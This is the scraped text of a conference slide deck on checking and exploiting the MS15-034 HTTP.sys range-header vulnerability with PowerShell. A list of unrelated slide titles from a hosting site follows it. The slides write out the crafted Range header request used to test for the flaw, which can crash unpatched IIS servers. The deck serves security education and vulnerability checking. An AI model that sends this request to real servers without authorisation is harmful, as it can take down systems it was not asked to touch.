exploiting ms15-034 in powershell

EXPLOITING MS15-034 IN POWERSHELL

KIERAN JACOBSENTECHNICAL LEAD - READIFY

@KJACOBSEN – POSHSECURITY.COM

‘REMOTE CODE EXECUTION’ -IN HTTP.SYS

IF THE BAD GUY CAN EXECUTE CODE ON YOUR BOX, IT ISN’T YOUR BOX

ANYMORE.

HTTP.SYS IS EVERYWHERE

IIS KERNEL CACHING MODULE

ARE WE VULNERABLE?

REQUEST -> RESPONSE

GET / HTTP/1.1HOST: GOOGLE.COMRANGE: BYTES=0-18446744073709551615CONNECTION: CLOSE

GET / HTTP/1.1`R`NHOST: GOOGLE.COM`R`NRANGE: BYTES=0-18446744073709551615`R`NCONNECTION: CLOSE `R`N`R`N

STREAMS

WORKING WITH TCP

MS15034.PSM1

MORE INFORMATION

• MY WEBSITE – HTTP://POSHSECURITY.COM• TWITTER - @KJACOBSEN• MS15-034 MODULE – HTTP://GITHUB.COM/POSHSECURITY/MS15034 • MICROSOFT SECURITY BULLETIN - HTTPS://

TECHNET.MICROSOFT.COM/EN-US/LIBRARY/SECURITY/MS15-034.ASPX

exploiting ms15-034 in powershell

Technology

dell command | powershell provider version 1.3 … ·...

windows powershell windows server 2012. Índice powershell...

powershell shenanigans

powershell shenanigans lateral movement with powershell...

agenda for powershell (level:200) powershell introduction ...

fundamentals of leveraging powershell - def con con 25/def...

who should use powershell? you should use powershell!

goodman cb-ms15

essential powershell

sparked people | sparked customers powershell. agenda 2 wat...

powershell studio 2020 is the premier windows powershell...

powershell crashcourse

powershell notes

powershell remoting

dell command | powershell provider version 1.0...

gestuz ms15

l m17:-;l1~:ft °°-5 i =1 030~ i 030 vr m t~2~ l-v … ·...

powershell ebook

ms15/1.1 investment and corporate banking market study...

mastering powershell